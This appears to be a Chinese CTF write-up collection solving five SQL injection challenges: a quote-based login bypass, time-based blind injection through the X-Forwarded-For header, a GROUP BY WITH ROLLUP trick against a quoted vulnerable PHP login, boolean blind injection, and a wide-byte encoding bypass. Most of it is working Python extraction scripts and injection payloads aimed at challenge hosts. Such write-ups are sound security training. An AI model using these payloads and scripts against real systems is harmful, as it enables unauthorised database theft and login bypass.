【1】 题目给出过滤了一切,测试得知没有过滤 "\"|and|left|right"等关键字。重要的是不管输入正确与否的SQL句子,总是返回想回的页面,尝试各种方法都是一样的结果。
感觉只能是逻辑绕过。猜测进行验证的代码应该为
select * from *** where username ="" and password="";
目前用户名和密码没有一个知道的。无奈中,发呆好长时间
成功绕过。
username=hello"=" & password = hello"="
拿到flag
【2】XFF基于时间无过滤注入
' or sleep(10) and ''='
延时,说明有注入
' or sleep((select length(flag) from flag)=32) and ''='
验证flag长度为32
直接上代码
#coding:utf-8 """ @author: elope """ import requests; maystr="0987654321qwertyuiopasdfghjklzxcvbnm." flag='' for j in range(33): for i in maystr: url="http://ctf5.shiyanbar.com/web/wonderkun/index.php" header={ # "X-Forwarded-For":"' +(select case when (substring((select database())from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j,i) #跑数据库的名字 #"X-Forwarded-For":"' +(select case when (substring((select(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j,i) #跑表明 #"X-Forwarded-For":"' +(select case when (substring((select(select(group_concat(column_name))from(information_schema.columns)where(table_name=0x666C6167))) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j,i) #跑字段名 "X-Forwarded-For":"' +(select case when (substring((select flag from flag) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j,i) #跑记录 } try: res=requests.get(url, headers=header,timeout=4).text except: flag+=i print flag # print res
这个代码双重绕过,虽然比较慢,但是准确度更高一点
import requests import time url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php" maystr="0987654321qwertyuiopasdfghjklzx{_-%!@&*^(?|)}cvbnm." flag='' for i in range(33): for j in maystr: starttime = time.time() headers = {"X-Forwarded-For":"' +(select case when (substring((select flag from flag) from %s for 1)='%s') then sleep(15) else 0 end) and 'Zkkp'='Zkkp" % (i,j)} res = requests.get(url,headers=headers) if time.time()-starttime > 10: res = requests.get(url,headers=headers) if time.time()-starttime > 10: flag += j print flag break else: pass
直接出结果
【3】强制使密码为空
直接上代码吧
<?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '<form action="" method="post">'."<br/>"; echo '<input name="uname" type="text"/>'."<br/>"; echo '<input name="pwd" type="text"/>'."<br/>"; echo '<input type="submit" />'."<br/>"; echo '</form>'."<br/>"; echo '<!--source: source.txt-->'."<br/>"; die; } function AttackFilter($StrKey,$StrValue,$ArrReq){ if (is_array($StrValue)){ $StrValue=implode($StrValue); } if (preg_match("/".$ArrReq."/is",$StrValue)==1){ print "水可载舟,亦可赛艇!"; exit(); } } $filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)"; foreach($_POST as $key=>$value){ AttackFilter($key,$value,$filter); } $con = mysql_connect("XXXXXX","XXXXXX","XXXXXX"); if (!$con){ die('Could not connect: ' . mysql_error()); } $db="XXXXXX"; mysql_select_db($db, $con); $sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'"; $query = mysql_query($sql); if (mysql_num_rows($query) == 1) { $key = mysql_fetch_array($query); if($key['pwd'] == $_POST['pwd']) { print "CTF{XXXXXX}"; }else{ print "亦可赛艇!"; } }else{ print "一颗赛艇!"; } mysql_close($con); ?>
绕过用户名容易 。直接使用uname = ' or 1=1 limit 1#
使返回一条 就绕过
但是需要填进去的密码,和读出来的密码相同。这不是废话么,相同的话不是直接拿到了
if($key['pwd'] == $_POST['pwd'])
发现这个。我们使读出来的密码为空不是可以了。
查看有几个用户
select * from test offset 1 limit 1; 正常
select * from test offset 1 limit 1;错误
说明只有两行
现在需要构造一个NULL值
成功。
直接输入 uname = admin' or 1=1 group by pwd with rollup limit 1 offset 2#&pwd=(空)
返回flag
【4】无脑洞的盲住
直接贴代码
import requests flag ="" for i in range(1,30): for j in range(33,126): url = "http://ctf5.shiyanbar.com/web/index_3.php?id=1'and if(ascii(substr((select flag from flag),"+str(i)+",1))="+str(j)+",1,0)%23" res = requests.get(url) if(res.text.encode('GBK','ignore').find('Hello') != -1): flag += chr(int(j)) print flag break else: pass
【5】njctf一道题
过滤了空格。双字节编码。对单引号进行编码,对双引号当成字符输入,所以用16进制编码绕过。
import string import binascii import requests s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\]^_`{|}~" u = "http://218.2.197.235:23733/index.php?key=a%df'||right(left((select(flag)from(flag)),{pos}),1)=0x{c}%23" payload = '' for i in xrange(1, 35): for c in s: url = u.format(pos=i, c=binascii.hexlify(c)) r = requests.get(url) if 'showContent' in r.content: sign = 1 payload += c print payload break if payload[-1] == '}': break